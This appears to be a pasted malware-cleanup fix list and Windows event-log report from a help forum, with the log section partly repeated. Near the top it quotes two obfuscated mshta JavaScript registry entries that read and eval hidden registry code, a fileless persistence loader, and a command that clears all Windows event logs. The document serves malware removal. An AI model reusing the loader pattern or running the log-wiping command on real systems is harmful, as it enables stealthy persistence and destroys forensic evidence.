Task: {CD0C4A4F-7934-4C1C-B5B7-100C05A17EAF} - System32\Tasks\{34CBDC00-3CBA-4835-BC55-E95FC3A0F944} => pcalua.exe -a C:\Users\Dorraine\Downloads\bouncy_snowmen.exe -d C:\Users\Dorraine\Downloads
Task: {CD2C8A99-3A16-49FE-A426-5A21F0049B28} - \Microsoft\Windows\Setup\gwx\rundetector -> No File <==== ATTENTION
Task: {E1DA30AF-E430-47F4-A4A3-0D03A968574D} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> No File <==== ATTENTION
Task: {EB022CFD-2B91-4BE4-BF5A-BB26BEB9DE8B} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> No File <==== ATTENTION
Task: {F083E0F2-9ED4-4AC1-A705-073D81C43930} - \Microsoft\Windows\Setup\GWXTriggers\ScheduleUpgradeTime -> No File <==== ATTENTION
Task: {F305E9EB-6B8E-483E-A859-144C5B87F227} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> No File <==== ATTENTION
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\WINDOWS\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\3befe: "C:\WINDOWS\system32\mshta.exe" "javascript:xo1HK5M="i2z";l7I2=new ActiveXObject("WScript.Shell");kB7uBa3="b4Nsza";J3iVy2=l7I2.RegRead("HKCU\\software\\fnbc\\szon");PI7TM6="I1PHTLV";eval(J3iVy2);gh4Qj0c="DT5h";" <===== ATTENTION
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Classes\e30a8741: "C:\WINDOWS\system32\mshta.exe" "javascript:YgjdAp2="tW";F5b=new ActiveXObject("WScript.Shell");yCFFDJ5i="c";a6wXv2=F5b.RegRead("HKCU\\software\\ycqzblx\\isbkuu");XgoRnR5L7="BEfn";eval(a6wXv2);TXVMr6="W2";" <===== ATTENTION
C:\Users\Dorraine\AppData\Local\360fd
C:\Users\Dorraine\AppData\Local\7df78865
CMD: for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:09:33 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 08/12/2016 6:30:47 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 05/12/2016 4:11:37 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 25/11/2016 6:24:29 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 20/11/2016 9:34:31 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 14/11/2016 6:10:56 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 12/11/2016 11:30:59 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 12/11/2016 4:26:35 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 11/11/2016 7:24:42 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 11/11/2016 7:03:35 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 03/11/2016 11:29:02 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 20/10/2016 10:16:17 PM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
Log: 'System' Date/Time: 13/10/2016 7:20:16 AM
Type: Critical Category: 63
Event: 41 Source: Microsoft-Windows-Kernel-Power
The system has rebooted without cleanly shutting down first. This error could be caused if the system stopped responding, crashed, or lost power unexpectedly.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 11/01/2017 7:08:31 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:08:30 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:06:23 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:06:22 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:04:14 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:04:14 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:02:06 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 7:02:06 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:59:58 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:59:58 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:57:50 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:57:50 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:55:42 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:55:42 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:53:34 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:53:34 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:51:26 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:51:26 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:49:18 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
Log: 'System' Date/Time: 11/01/2017 6:49:18 PM
Type: Error Category: 0
Event: 36874 Source: Schannel
An TLS 1.0 connection request was received from a remote client application, but none of the cipher suites supported by the client application are supported by the server. The TLS connection request has failed.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'System' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_Compact_Flash&Rev_1.01#058F63626420&1#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_MS#MS-Pro&Rev_1.03#058F63626420&3#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_SD#MMC&Rev_1.00#058F63626420&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 6:17:21 PM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_SM#xD_Picture&Rev_1.02#058F63626420&2#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Log: 'System' Date/Time: 11/01/2017 7:54:41 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name videos.vehicledata.com timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 07/01/2017 8:26:51 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 04/01/2017 6:04:12 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 153 Source: disk
The IO operation at logical block address 0x2388 for Disk 1 (PDO name: \Device\00000031) was retried.
Log: 'System' Date/Time: 31/12/2016 9:43:42 PM
Type: Warning Category: 0
Event: 51 Source: disk
An error was detected on device \Device\Harddisk1\DR1 during a paging operation.
Log: 'System' Date/Time: 31/12/2016 6:49:46 PM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name vast.ssp.optimatic.com timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 30/12/2016 8:24:23 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 29/12/2016 8:28:50 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name imrk.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 28/12/2016 5:01:57 AM
Type: Warning Category: 1014
Event: 1014 Source: Microsoft-Windows-DNS-Client
Name resolution for the name dpm.demdex.net timed out after none of the configured DNS servers responded.
Log: 'System' Date/Time: 28/12/2016 1:19:36 AM
Type: Warning Category: 212
Event: 219 Source: Microsoft-Windows-Kernel-PnP
The driver \Driver\WudfRd failed to load for the device SWD\WPDBUSENUM\_??_USBSTOR#Disk&Ven_Generic-&Prod_Compact_Flash&Rev_1.01#058F63626420&1#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}.
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Photos_8wekyb3d8bbwe!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:02 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:35:57 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 11:31:50 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:21:53 AM
Type: Error Category: 2400
Event: 2484 Source: Microsoft-Windows-Immersive-Shell
Package Microsoft.Windows.Photos_16.1118.10000.0_x64__8wekyb3d8bbwe+App was terminated because it took too long to suspend.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:43 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:37 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 10:46:01 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Warning Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:18:41 PM
Type: Warning Category: 3
Event: 472 Source: ESENT
taskhostw (3696) WebCacheLocal: The shadow header page of file C:\Users\Dorraine\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat was damaged. The primary header page (32768 bytes) was used instead.
Log: 'Application' Date/Time: 31/12/2016 3:49:03 AM
Type: Warning Category: 3
Event: 3036 Source: Microsoft-Windows-Search
Crawl could not be completed on content source <iehistory://{S-1-5-21-2694957348-435827945-4273115747-1000}/>.
Context: Application, SystemIndex Catalog
Details:
The system cannot find the file specified. (HRESULT : 0x80070002) (0x80070002)
Log: 'Application' Date/Time: 15/12/2016 12:15:25 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 15/12/2016 12:15:05 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 14/12/2016 11:04:54 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\NFSSNO~2.SCR' (pid 59132) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 6:04:24 PM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 53016) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 12/12/2016 12:02:48 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 12/12/2016 12:02:31 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 17/11/2016 7:24:01 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes succeeded, but took an abnormally long time (50 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 17/11/2016 7:23:48 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (1016) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\tmp.edb" at offset 0 (0x0000000000000000) for 16384 (0x00004000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 11/11/2016 10:39:07 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 11/11/2016 10:38:55 PM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 03/11/2016 11:33:39 PM
Type: Warning Category: 7
Event: 508 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes succeeded, but took an abnormally long time (15 seconds) to be serviced by the OS. This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 03/11/2016 11:33:26 PM
Type: Warning Category: 1
Event: 533 Source: ESENT
wuaueng.dll (376) SUS20ClientDataStore: A request to write to the file "C:\WINDOWS\SoftwareDistribution\DataStore\Logs\edb.log" at offset 184320 (0x000000000002d000) for 4096 (0x00001000) bytes has not completed for 36 second(s). This problem is likely due to faulty hardware. Please contact your hardware vendor for further assistance diagnosing the problem.
Log: 'Application' Date/Time: 02/11/2016 10:13:27 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 02/11/2016 10:13:02 AM
Type: Warning Category: 0
Event: 6001 Source: Microsoft-Windows-Winlogon
The winlogon notification subscriber <Sens> failed a notification event.
Log: 'Application' Date/Time: 31/10/2016 2:14:20 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 288036) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:14 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 285736) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:09 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 289544) cannot be restarted - Application SID does not match Conductor SID..
Log: 'Application' Date/Time: 31/10/2016 2:14:08 AM
Type: Warning Category: 0
Event: 10010 Source: Microsoft-Windows-RestartManager
Application 'C:\Windows\SysWOW64\regsvr32.exe' (pid 286504) cannot be restarted - Application SID does not match Conductor SID..
Vino's Event Viewer v01c run on Windows 7 in English
Report run at 11/01/2017 2:12:40 PM
Note: All dates below are in the format dd/mm/yyyy
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Critical Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
'Application' Log - Error Type
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Log: 'Application' Date/Time: 11/01/2017 6:17:44 PM
Type: Error Category: 3
Event: 320 Source: DbxSvc
Failed to connect to the driver: (-2147024894) The system cannot find the file specified.
Log: 'Application' Date/Time: 11/01/2017 3:23:00 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 11/01/2017 3:18:19 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:58:16 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:46 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:45 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:38 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
Activation of app Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy!App failed with error: The app didn't start in the required time. See the Microsoft-Windows-TWinUI/Operational log for additional information.
Log: 'Application' Date/Time: 10/01/2017 11:52:04 AM
Type: Error Category: 5973
Event: 5973 Source: Microsoft-Windows-Immersive-Shell
